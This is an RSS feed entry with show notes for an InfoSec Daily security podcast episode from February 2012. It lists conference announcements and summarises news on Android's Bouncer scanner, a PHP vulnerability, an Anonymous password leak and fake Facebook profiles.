<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
		xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd"
	xmlns:media="http://search.yahoo.com/mrss/"
>

<channel>
	<title>InfoSec Daily &#187; Podcast</title>
	<atom:link href="http://www.isdpodcast.com/category/podcast/feed" rel="self" type="application/rss+xml" />
	<link>http://www.isdpodcast.com</link>
	<description>Your daily source of Pwnage, Policy and Politics.</description>
	<lastBuildDate>Sat, 04 Feb 2012 01:58:49 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
	<copyright>Copyright © InfoSec Daily 2011 http://creativecommons.org/licenses/by-nc-sa/2.5/</copyright>
	<managingEditor>admin@isdpodcast.com (Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.)</managingEditor>
	<webMaster>admin@isdpodcast.com (Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.)</webMaster>
	<ttl>1440</ttl>
	<image>
		<url>http://www.isdpodcast.com/podcasts/infoSec-Daily-Logo_b_144.jpg</url>
		<title>InfoSec Daily</title>
		<link>http://www.isdpodcast.com</link>
		<width>144</width>
		<height>144</height>
	</image>
	<itunes:subtitle></itunes:subtitle>
	<itunes:summary>Your daily source of Pwnage, Policy and Politics.</itunes:summary>
	<itunes:keywords>Information, Security, Hacking, Vulnerabilities, InfoSec, Exploits, Security, Pwnage, Security, News, Exploits</itunes:keywords>
	<itunes:category text="Technology">
		<itunes:category text="Podcasting" />
	</itunes:category>
	<itunes:category text="Technology" />
	<itunes:category text="Business">
		<itunes:category text="Careers" />
	</itunes:category>
	<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
	<itunes:owner>
		<itunes:name>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:name>
		<itunes:email>admin@isdpodcast.com</itunes:email>
	</itunes:owner>
	<itunes:block>no</itunes:block>
	<itunes:explicit>no</itunes:explicit>
	<itunes:image href="http://www.isdpodcast.com/podcasts/infoSec-Daily-Logo_b_144.jpg" />
		<item>
		<title>Episode 585 &#8211; Eyes Open, Bouncer, PHP, NATO Deficiencies, Fakebook Accounts &amp; What’s New?</title>
		<link>http://www.isdpodcast.com/episode-585-eyes-open-bouncer-php-nato-deficiencies-fakebook-accounts-whats-new</link>
		<comments>http://www.isdpodcast.com/episode-585-eyes-open-bouncer-php-nato-deficiencies-fakebook-accounts-whats-new#comments</comments>
		<pubDate>Sat, 04 Feb 2012 01:58:49 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3457</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 585 for February 3, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez, &#160; Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 585 for February 3, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez,</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unsung Heros</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.c22.cc/2012/01/13/unsung-heros</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://howto.cnet.com/8301-11310_39-57368016-285/how-to-prevent-google-from-tracking-you/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></a></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.forbes.com/sites/andygreenberg/2012/02/02/google-gets-serious-about-android-security-now-auto-scans-app-market-for-malware/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.forbes.com/sites/andygreenberg/2012/02/02/google-gets-serious-about-android-security-now-auto-scans-app-market-for-malware/</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://howto.cnet.com/8301-11310_39-57368016-285/how-to-prevent-google-from-tracking-you/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></a><a href="http://googlemobile.blogspot.com/2012/02/android-and-security.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://googlemobile.blogspot.com/2012/02/android-and-security.html </span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The last year has been a phenomenal one for the Android ecosystem. Device activations grew 250% year-on-year, and the total number of app downloads from Android Market topped 11 billion. As the platform continues to grow, we&rsquo;re focused on bringing you the best new features and innovations &#8211; including in security.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Today we&rsquo;re revealing a service we&rsquo;ve developed, codenamed Bouncer, which provides automated scanning of Android Market for potentially malicious software without disrupting the user experience of Android Market or requiring developers to go through an application approval process.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The service performs a set of analyses on new applications, applications already in Android Market, and developer accounts. Here&rsquo;s how it works: once an application is uploaded, the service immediately starts analyzing it for known malware, spyware and trojans. It also looks for behaviors that indicate an application might be misbehaving, and compares it against previously analyzed apps to detect possible red flags. We actually run every application on Google&rsquo;s cloud infrastructure and simulate how it will run on an Android device to look for hidden, malicious behavior. We also analyze new developer accounts to help prevent malicious and repeat-offending developers from coming back. </span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://howto.cnet.com/8301-11310_39-57368016-285/how-to-prevent-google-from-tracking-you/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.h-online.com/security/news/item/Critical-PHP-vulnerability-being-fixed-1427316.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.h-online.com/security/news/item/Critical-PHP-vulnerability-being-fixed-1427316.html</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The PHP developers are working to fix a critical security vulnerability in PHP that they introduced with a recent security patch. The current stable release is affected; however, it is not yet clear whether the questionable patch was also applied to older versions.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The cause of the problem is the security update to PHP 5.3.9, which was written to prevent denial of service (DoS) attacks using hash collisions. To do so, the developers limited the maximum possible number of input parameters to 1,000 in php_variables.c using max_input_vars. Because of mistakes in the implementation, hackers can intentionally exceed this limit and inject and execute code. The bug is considered to be critical as code can be remotely injected over the web.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://howto.cnet.com/8301-11310_39-57368016-285/how-to-prevent-google-from-tracking-you/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></a><a href="http://news.softpedia.com/news/Anonymous-Leaks-Passwords-from-Ireland-s-Foreign-Affairs-Site-250514.shtml"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/Anonymous-Leaks-Passwords-from-Ireland-s-Foreign-Affairs-Site-250514.shtml</span></a></p>
<p>&nbsp;</p>
<div dir="ltr">
<table style="border:none;border-collapse:collapse">
<colgroup>
<col width="125" /></colgroup>
</table>
</div>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous hackers managed to gain access to the official website of the Irish government&rsquo;s Department of Foreign Affairs, obtaining passwords used by employees and officials. Some of the passwords were used to administrate the website Irish Aid, an overseas development program.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to</span><a href="http://www.thejournal.ie/government-website-passwords-obtained-by-anonymous-hacker-343904-Feb2012/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">The Journal</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, members of Anonymous Sweden led to believe that these attacks, part of OpIreland, were launched as a protest against the plans to introduce a new SOPA-like legislation.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Of the 19 credential sets leaked, 17 were used by the Department of Foreign Affairs to edit the Irish Aid website, while the other 2 were utilized by the staffers of the company that developed the site.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;We are aware of website user login information being posted online. The website server has been taken offline as a precautionary measure and the matter is being investigated by our IT specialists,&rdquo; said a Department of Foreign Affairs spokeswoman.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;This is an external service and is separate to the internal Department servers; these have not been affected.&rdquo;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It seems that Se&aacute;n Sherlock, the junior minister behind the new law, is one of the main targets, Anonymous revealing that it plans on targeting the Labour Party&rsquo;s website next, part of which Sherlock is a member.</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://howto.cnet.com/8301-11310_39-57368016-285/how-to-prevent-google-from-tracking-you/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></a><a href="http://news.cnet.com/8301-27080_3-57370710-245/how-to-identify-fake-facebook-accounts"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.cnet.com/8301-27080_3-57370710-245/how-to-identify-fake-facebook-accounts</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hello, Facebook friends, I am male, straight, often ridiculously good-looking, and this is a real message: she&#39;s not that into you.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">And by she, I mean one of those hot girls on Facebook who always seems too desperate and overzealous in trying to connect to you and everyone on your friend list.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Apparently, of some 850 million active Facebook users, a lot are fake profiles created to spread spam and viruses. These are often categorized as spammers or attackers. Security firm Barracuda Networks released today the findings from its most recent study that helps distinguish attackers from real users. Here are the study&#39;s four key findings.</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
